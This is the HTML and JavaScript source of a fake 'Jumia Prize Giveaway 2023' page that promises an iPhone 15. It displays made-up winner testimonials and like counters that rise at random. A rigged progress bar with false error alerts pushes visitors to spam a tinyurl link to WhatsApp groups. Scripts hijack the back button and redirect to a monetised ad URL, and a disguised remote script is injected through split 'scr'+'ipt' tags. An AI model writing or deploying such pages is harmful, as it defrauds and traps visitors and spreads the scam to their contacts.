
<html>
    
<head>
    <script>

        function set_Cookie(name,value){
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + (Days*20*1000));
            document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+"; path=/;"
        }
        function get_Cookie(name){
            var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
            if(arr=document.cookie.match(reg)){
                return unescape(arr[2]);
            }
            return '';
        }


      

    </script>
  
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>Jumia Prize Giveaway 2023 </title>
        <link rel="stylesheet" href="style.css">
     
        <meta name="og:title" content="Jumia Prize Giveaway 2023 " />
      
 
</head>
<body>
<style type="text/css">


.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 100%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 200px;
    margin: 10px auto;
    border-radius: 0px;
}
#loader {
    text-align: center;
}

@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}

.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid orange;
}
#fill,
#fill2 {
    background: orange;
    width: 0%;
    height: 100%;
}
.percentage {
  margin-top: -42px;
    width: 90px;
    float: right;
    height: 38px;
    font-size: 16px;
    border: 2px solid orange;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
#claim{display: none}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2; 
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}

.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
.A{
    text-align: center;
    background-color: rgb(151, 199, 149);
}
</style>
  
          <img style=" margin-left:-7px; width: 104%; margin-top: -7px; height: auto" src="1.jpeg" alt="">
    <center>
  <script>
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://www.profitablecreativeformat.com/e8322d38d3e3909e279ee41acbc53186/invoke.js"></scr' + 'ipt>');
</script> 
    </center>
        
        <div id="share">

           <h3>Congratulations!!</h3>
            <p>Proceed to claim your prize: 
            </p>
            <p class="tip">1. Share it with 5 groups or 15 friends on WhatsApp (Click on the "SHARE" icon below).</p>
            <p class="tip">2. You will be redirected automatically to "<b>Order Page</b>" after the verification bar is filled.</p>
           

            <button style="color: black;font-weight: 500" id="whatsapp">SHARE NOW</button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x"></i></p>
            <h2>Exciting News!</h2>
            <p class="title"> 
            
            The moment you've been waiting for is finally here! Your chance to grab your order:
            <br><br>
            
            1. Click the button below: To grab your order now, This is your portal to claiming the prize.
            <br><br>
            2. Enter Your Details: Fill in your information accurately 
            <br><br>
            3. Confirm Your Order: Double-check your details, and with a simple click, 
            <br><br>
            
            4. Fast Checkout: Complete the quick and easy checkout process. Jumia's user
            <br><br>
            5. Get Ready to Unbox Joy: Once your order is confirmed, get ready for the excitement! Your iPhone 15 will be delivered to your doorstep.
            <br><br>
            Don't let this golden opportunity </p>
            <button href="https://www.highcpmrevenuegate.com/xracf2t8?key=8b24ed3bef5abcdcd5680141b67ff860" id="offer"> Grab your Order Now!!</button>
          
           </div>
    
               
    <script src="jquery-latest.min.js"></script>

   <br>
   <br>
   <div class="cm">
     <p>Comment  <span>9/20</span></p>
   </div>
   
   <div class="comment">
     <div class="im">
        <img src="a.png" alt="">
      <h4>Emeka Adebayo</h4>
     <br>
     
     </div>
    <p class="ig">Wow, couldn't believe my luck! Got the iPhone 15 pro from Jumia's giveaway. Super grateful!</p>
    <div class="like">
        <img  src="0.png" alt="">
        <p>1 minute ago</p>
    </div>
     
   </div>
   <br><br>
      <div class="comment">
     <div class="im">
        <img src="b.jpeg" alt="">
      <h4>Chinwe Okafor</h4>
     <br>
     
     </div>
    <p class="ig">Jumia just made my day! Unboxed the iPhone 15 pro max giveaway and it's amazing. Thanks a lot!</p>
    <div class="like">
        <img  src="0.png" alt="">
        <p>3 minutes ago</p>
    </div>
     
   </div>
   <br><br>
     <div class="comment">
     <div class="im">
        <img src="c.jpeg" alt="">
      <h4>Ibrahim Adeyemi</h4>
     <br>
     
     </div>
    <p class="ig">Received the iPhone 15 from Jumia's giveaway. Their generosity is unmatched. Shoutout to them!</p>
    <div class="like">
        <img  src="0.png" alt="">
        <p>7 minutes ago</p>
    </div>
     
   </div>
   <br><br>
     <div class="comment">
     <div class="im">
        <img src="d.png" alt="">
      <h4>Nneka Onyeka</h4>
     <br>
     
     </div>
    <p class="ig">Jumping with joy for winning the Jumia giveaway. iPhone 15 arrived and it's a dream come true!
    <div class="like">
        <img  src="0.png" alt="">
        <p>9 minutes ago</p>
    </div>
     
   </div>
   <br><br>
     <div class="comment">
     <div class="im">
        <img src="e.png" alt="">
      <h4>Chinedu Eze</h4>
     <br>
     
     </div>
    <p class="ig">Feeling blessed to have won the iPhone 15 giveaway by Jumia. It's sleek and stunning!</p>
    <div class="like">
        <img  src="0.png" alt="">
        <p>10 minutes ago</p>
    </div>
     
   </div>
   <br><br>
     <div class="comment">
     <div class="im">
        <img src="f.png" alt="">
      <h4>Amina Usman</h4>
     <br>
     
     </div>
    <p class="ig">Jumia's giveaway blessed me with an iPhone 15 Beyond excited right now!l</p>
    <div class="like">
        <img  src="0.png" alt="">
        <p>12 minutes ago</p>
    </div>
     
   </div>
   <br><br>
     <div class="comment">
     <div class="im">
        <img src="g.png" alt="">
      <h4>Ifeoma Okonkwo</h4>
     <br>
     
     </div>
    <p class="ig">Unbelievable! Jumia's iPhone 15 pro max giveaway is real. Holding it in my hands is surreal.</p>
    <div class="like">
        <img  src="0.png" alt="">
        <p>16 minutes ago</p>
    </div>
     
   </div>
   <br><br>
     <div class="comment">
     <div class="im">
        <img src="h.png" alt="">
      <h4>Tunde Adewale</h4>
     <br>
     
     </div>
    <p class="ig">Massive thanks to Jumia for the iPhone 15 pro giveaway prize. Impressed beyond words!</p>
    <div class="like">
        <img  src="0.png" alt="">
        <p>17 minutes ago</p>
    </div>
     
   </div>
   <br><br>
     <div class="comment">
     <div class="im">
        <img src="i.png" alt="">
      <h4>Chioma Obi</h4>
     <br>
     
     </div>
    <p class="ig">Jumia truly knows how to make people smile. The iPhone 15 pro max from their giveaway is a game-changer for me!</p>
    <div class="like">
        <img  src="0.png" alt="">
        <p>1 minute ago</p>
    </div>
     
   </div>
   
    <br>
   <input class="test" placeholder="     comment here..." type="text">
  
<br><br>

<img style=" margin-left:-7px; width: 104%; margin-top: -7px; height: auto" src="9.jpg" alt="">



<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});
</script>








<script type="text/javascript">

</script>

    <script>
          var text1 ="*Exciting News!*\n \n *Jumia's Giveaway is Back Again!!!*\n \n *Stand a Chance to Win the Latest Iphone 15*\n*Click the link below to get started*\n",
        
            text2 = " an amount of ",
            text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
            error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
            abcde = "   https://www.highcpmrevenuegate.com/xracf2t8?key=8b24ed3bef5abcdcd5680141b67ff860 ",
            saved = "",
            link = " \n https://tinyurl.com/Jumia-Iphone-15-Giveaway"
            share = "whatsapp://send?text=" + text1 + link;
    </script>






<script type="text/javascript">
 var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $("#intro").fadeOut(0);
    $(".comments").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.location.href = share;
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 2;
    } else if (width == 87) {
        width += 1;
    } else if (width == 88) {
        width += 2;
    } else if (width == 90) {
        width += 1;
    } else if (width == 91) {
        width += 1;
    } else if (width == 92) {
        width += 1;
    } else if (width == 93) {
        width += 1;
    } else if (width == 94) {
        width += 1;
    } else if (width == 95) {
        width += 1;
    } else if (width == 96) {
        width += 2;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(abcde, "_blank");
});
</script>

 <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src=" https://www.highcpmrevenuegate.com/xracf2t8?key=8b24ed3bef5abcdcd5680141b67ff860 "></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-YSZ8S8C2VB');
</script>

<script>
    window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {
        fh();}
    setTimeout('hh();', 500);
    function fh(){
        location.href="https://www.highcpmrevenuegate.com/xracf2t8?key=8b24ed3bef5abcdcd5680141b67ff860";
    }
    function goon(){
        location.href="https://www.highcpmrevenuegate.com/xracf2t8?key=8b24ed3bef5abcdcd5680141b67ff860 ";
    }
</script>

<script>
(function (global) {

    if(typeof (global) === "undefined")
    {?  :
        throw new Error("window is undefined");
    }

    var _hash = "!";
    var noBackPlease = function () {
        global.location.href += "#";

        // making sure we have the fruit available for juice....
        // 50 milliseconds for just once do not cost much (^__^)
        global.setTimeout(function () {
            global.location.href += "!";
        }, 50);
    };
    
    // Earlier we had setInerval here....
    global.onhashchange = function () {
        if (global.location.hash !== _hash) {
            global.location.hash = _hash;
        }
    };

    global.onload = function () {
        
        noBackPlease();

        // disables backspace on page except on input fields and textarea..
        document.body.onkeydown = function (e) {
            var elm = e.target.nodeName.toLowerCase();
            if (e.which === 8 && (elm !== 'input' && elm  !== 'textarea')) {
                e.preventDefault();
            }
            // stopping event bubbling up the DOM tree..
            e.stopPropagation();
        };
        
    };

})(window);
</script>
<center><script type="text/javascript" src="../widget.supercounters.com/ssl/online_i.js"></script><script type="text/javascript">sc_online_i(1666427,"ffffff","ffffff");</script><br>
</center> 

</body>

</html>
